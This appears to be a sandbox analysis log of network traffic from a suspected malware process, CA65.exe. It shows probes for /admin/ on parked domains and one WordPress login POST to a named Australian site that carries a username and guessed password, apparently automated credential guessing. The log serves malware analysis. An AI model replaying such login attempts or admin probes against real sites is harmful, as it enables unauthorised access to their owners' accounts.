2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 72 65 62 6f 6f 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 3f 61 61 3d 32 30 32 31 2d 30 36 2d 30 39 61 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 Data Ascii: ink rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/reboot.min.css"><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/style.css?aa=2021-06-09a"><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 74 74 70 73 3a 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 2f 7a 79 77 36 6d 64 73 2e 63 73 73 22 3e 0a 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 37 31 31 37 33 33 39 2d 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0d 0a 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0d 0a 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0d 0a 2f 2a 20 67 74 61 Data Ascii: ttps://use.typekit.net/zyw6mds.css"><script async src="https://www.googletagmanager.com/gtag/js?id=UA-7117339-4"></script><script>window.dataLayer = window.dataLayer \|\| [];function gtag(){dataLayer.push(arguments);}gtag('js', new Date());/* gta
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 6b 3d 22 68 65 61 64 65 72 4d 6f 62 69 6c 65 53 65 61 72 63 68 4d 61 67 46 75 6e 63 28 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 62 6f 78 20 22 20 69 64 3d 22 68 64 76 33 48 65 61 64 65 72 53 65 61 72 63 68 42 6f 78 44 69 76 49 44 22 3e 0a 0a 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 64 6f 6d 61 69 6e 5f 73 65 61 72 63 68 2e 63 66 6d 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 66 6f 72 6d 22 20 69 64 3d 22 73 69 74 65 48 65 61 64 65 72 46 6f 72 6d 53 65 61 72 63 68 49 44 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e Data Ascii: k="headerMobileSearchMagFunc(); return false;"></div><div class="search-box " id="hdv3HeaderSearchBoxDivID"><form action="https://www.HugeDomains.com/domain_search.cfm" method="get" class="search-form" id="siteHeaderFormSearchID"><input type="text" n
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 68 6f 6e 65 2d 69 63 6f 6e 2e 70 6e 67 22 20 61 6c 74 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 74 65 6c 6c 2d 74 65 78 74 22 3e 2b 31 2d 33 30 33 2d 38 39 33 2d 30 35 35 32 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 6e 61 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 20 68 51 51 51 69 64 65 41 74 39 39 31 57 69 64 74 68 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 44 72 61 77 65 72 4c 61 79 20 22 20 6f 6e 63 6c 69 63 6b 3d 22 20 24 28 20 27 23 6e 61 76 54 6f 67 67 6c 65 27 20 29 2e 63 6c 69 63 6b 28 29 3b 20 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 4d 65 6e 75 20 64 2d 66 6c Data Ascii: hone-icon.png" alt><span class="tell-text">+1-303-893-0552</span></a></div></div></div><nav class="navbar hQQQideAt991Width"><div class="overDrawerLay " onclick=" $( '#navToggle' ).click(); "></div><div class="overlay "><div class="overlayMenu d-fl
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 6e 73 2e 63 6f 6d 2f 73 68 6f 70 70 69 6e 67 5f 63 61 72 74 2e 63 66 6d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 20 22 20 69 64 3d 22 68 64 76 33 48 65 61 64 65 72 53 68 6f 70 70 69 6e 67 43 61 72 74 4c 69 6e 6b 49 44 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 53 68 6f 70 70 69 6e 67 20 43 61 72 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 6f 62 69 6c 65 2d 73 68 6f 77 22 3e 53 68 6f 70 70 69 6e 67 20 63 61 72 74 3c 2f 73 70 61 6e 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 63 61 72 74 2e 70 6e 67 22 20 61 6c 74 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 61 72 74 2d 6e 75 6d 62 65 72 20 68 69 64 64 65 6e 41 Data Ascii: ns.com/shopping_cart.cfm" class="whiteLink " id="hdv3HeaderShoppingCartLinkID" aria-label="Shopping Cart"><span class="mobile-show">Shopping cart</span><img src="https://static.HugeDomains.com/images/hdv3-img/cart.png" alt><span class="cart-number hiddenA
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 63 75 6c 61 72 4a 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 31 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 32 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 33 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 34 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 35 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 36 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 37 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f Data Ascii: cularJ"><div class="circularJ_1"></div><div class="circularJ_2"></div><div class="circularJ_3"></div><div class="circularJ_4"></div><div class="circularJ_5"></div><div class="circularJ_6"></div><div class="circularJ_7"></div><div class="circularJ_
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 6c 73 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 72 65 64 69 74 69 20 22 3e 0a 3c 75 6c 3e 0a 3c 6c 69 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6d 67 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 33 30 64 61 79 73 6d 61 6c 6c 69 63 6f 2e 70 6e 67 22 20 61 6c 74 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 3e 33 30 2d 64 61 79 20 6d 6f 6e 65 79 20 62 61 63 6b 20 67 75 61 72 61 6e 74 65 65 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6d 67 22 3e 0a 3c 69 6d Data Ascii: ls</a></div><div class="crediti "><ul><li><div class="img"><img src="https://static.HugeDomains.com/images/hdv3-img/30daysmallico.png" alt></div><div class="content"><span>30-day money back guarantee</span></div></li><li><div class="img"><im
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 68 31 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 64 2d 74 2d 6e 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 66 6f 72 20 73 61 6c 65 3a 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 72 65 65 6e 22 3e 24 34 2c 34 39 35 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 62 6c 65 74 2d 62 6c 6f 63 6b 2d 73 22 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 42 75 79 20 6e 6f 77 20 66 6f 72 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 72 65 65 6e 22 3e 24 34 2c 34 39 35 3c 2f 73 70 61 6e 3e 20 6f 72 20 70 61 79 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 72 65 65 6e 22 3e 24 31 38 37 2e 32 39 3c 2f 73 70 61 6e 3e 20 70 65 72 20 6d 6f 6e 74 68 20 66 6f 72 20 32 34 20 6d 6f 6e 74 68 73 Data Ascii: h1><p class="d-t-n">This domain is for sale: <span class="green">$4,495</span></p></div><div class="tablet-block-s"><p class="text-center">Buy now for <span class="green">$4,495</span> or pay <span class="green">$187.29</span> per month for 24 months
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 78 3b 22 3e 0a 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 22 3e 6f 72 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 62 6c 65 74 2d 62 6c 6f 63 6b 2d 72 69 67 68 74 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 70 61 79 6d 65 6e 74 2d 70 6c 61 6e 2d 73 65 74 75 70 2e 63 66 6d 3f 64 3d 59 75 65 6a 69 43 68 65 6d 2e 63 6f 6d 22 20 63 6c 61 73 73 3d 22 62 74 6e 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 33 30 70 78 3b 20 77 69 64 74 68 3a 32 34 37 70 78 3b 20 6d 69 6e 2d 77 69 64 74 68 3a 32 34 37 70 78 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 20 22 20 69 64 3d 22 68 Data Ascii: x;"><span style="font-size:16px;">or</span></div><div class="tablet-block-right"><a href="https://www.HugeDomains.com/payment-plan-setup.cfm?d=YuejiChem.com" class="btn" style="padding-right:30px; width:247px; min-width:247px; margin-top:10px; " id="h

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
305	192.168.2.4	56518	3.33.130.190	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:11 UTC	324	OUT	GET /admin/ HTTP/1.1 Host: yandfcorp.com Accept: / Accept-Encoding: deflate, gzip Cookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:11 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:15:11 GMT Content-Type: text/html Content-Length: 1543 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-607" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_Ekuvt7MPVNbmctTjVPd5r01BpCmi1ZTwaMgnf8byun2GOjPbrvmwEa9NB34t2/XhIfFWAJs1XMzypb535lbmbA Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2023-12-22 20:15:11 UTC	1543	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
306	192.168.2.4	56519	13.248.169.48	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:11 UTC	334	OUT	GET /admin/ HTTP/1.1 Host: customizedperformance.com Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:11 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:15:11 GMT Content-Type: text/html Content-Length: 12976 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-32b0" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_cDmTFiGX4AWHl1/0PimCvnBxt/Hg5s49YhcCWkeq965ZmL9N2KH3sxWfCYuftp3zEkVf6qREECAiqk7ixU1HKA Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2023-12-22 20:15:11 UTC	12976	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
307	192.168.2.4	56344	185.162.89.66	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:11 UTC	432	OUT	POST /wp-login.php HTTP/1.1 Host: oceanictrailers.com.au Accept: / Accept-Encoding: deflate, gzip Cookie: wordpress_test_cookie=WP%20Cookie%20check User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://oceanictrailers.com.au/wp-login.php?redirect_to=https%3A%2F%2Foceanictrailers.com.au%2Fwp-admin%2F&reauth=1 Content-Length: 159 Content-Type: application/x-www-form-urlencoded
2023-12-22 20:15:11 UTC	159	OUT	Data Raw: 6c 6f 67 3d 64 61 76 69 64 25 34 30 6f 63 65 61 6e 69 63 74 72 61 69 6c 65 72 73 2e 63 6f 6d 2e 61 75 26 70 77 64 3d 54 72 61 69 6c 65 72 73 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 6f 63 65 61 6e 69 63 74 72 61 69 6c 65 72 73 2e 63 6f 6d 2e 61 75 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=david%40oceanictrailers.com.au&pwd=Trailers&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Foceanictrailers.com.au%2Fwp-admin%2F&testcookie=1
2023-12-22 20:15:11 UTC	508	IN	HTTP/1.1 200 OK Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 set-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure x-frame-options: SAMEORIGIN content-length: 6139 date: Fri, 22 Dec 2023 20:15:11 GMT alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2023-12-22 20:15:11 UTC	860	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 4f 63 65 61 6e 69 63 20 54 72 61 69 6c 65 72 73 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 61 72 63 68 69 76 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Oceanic Trailers — WordPress</title><meta name='robots' content='max-image-preview:large, noindex, noarchiv
2023-12-22 20:15:11 UTC	5279	IN	Data Raw: 2e 61 75 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 6f 67 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 65 66 65 72 72 65 72 27 20 63 6f 6e 74 65 6e 74 3d 27 73 74 72 69 63 74 2d 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 2d 6f 72 69 67 69 6e 27 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6f 63 65 61 6e 69 63 74 72 61 69 6c 65 72 73 2e 63 6f 6d 2e 61 75 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f Data Ascii: .au/wp-admin/css/login.min.css?ver=6.4.2' media='all' /><meta name='referrer' content='strict-origin-when-cross-origin' /><meta name="viewport" content="width=device-width" /><link rel="icon" href="https://oceanictrailers.com.au/wp-content/uploads/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
308	192.168.2.4	56562	104.26.6.37	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:11 UTC	207	OUT	GET /domain_profile.cfm?d=keywordranker.com HTTP/1.1 Host: www.hugedomains.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:11 UTC	792	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:15:11 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close cache-control: private vary: Accept-Encoding set-cookie: site_version_phase=108; expires=Mon, 16-Dec-2024 20:15:11 GMT; path=/ set-cookie: site_version=HDv3; expires=Mon, 16-Dec-2024 20:15:11 GMT; path=/ x-powered-by: ASP.NET lb: TclPrdLbHd3 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RHC4NR86PkVQg97Idy9NdKbx9xxbOqWnkRooZhKQgCa46B%2BYeVd4S1oAjbTLGmOsJb5KuV6z8n7qkGYnkbCjx8OXDGdZD6VQRRLE5gIukwYqvfuzUZCYQcfe2Kn4VDMVgKNeb4M%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b09100c62da2b-MIA
2023-12-22 20:15:11 UTC	577	IN	Data Raw: 37 63 38 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 73 63 72 69 70 74 20 69 64 3d 22 63 6f 6f 6b 69 65 79 65 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 63 6f 6f 6b 69 65 79 65 73 2e 63 6f 6d 2f 63 6c 69 65 6e 74 5f 64 61 74 61 2f 65 37 31 62 63 35 33 66 31 63 62 38 38 36 36 36 64 31 36 30 63 31 65 32 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65 Data Ascii: 7c8a<!DOCTYPE html><html lang="en"><head><script id="cookieyes" type="text/javascript" src="https://cdn-cookieyes.com/client_data/e71bc53f1cb88666d160c1e2/script.js"></script><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><me
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 72 65 62 6f 6f 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 3f 61 61 3d 32 30 32 31 2d 30 36 2d 30 39 61 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 Data Ascii: ink rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/reboot.min.css"><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/style.css?aa=2021-06-09a"><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv
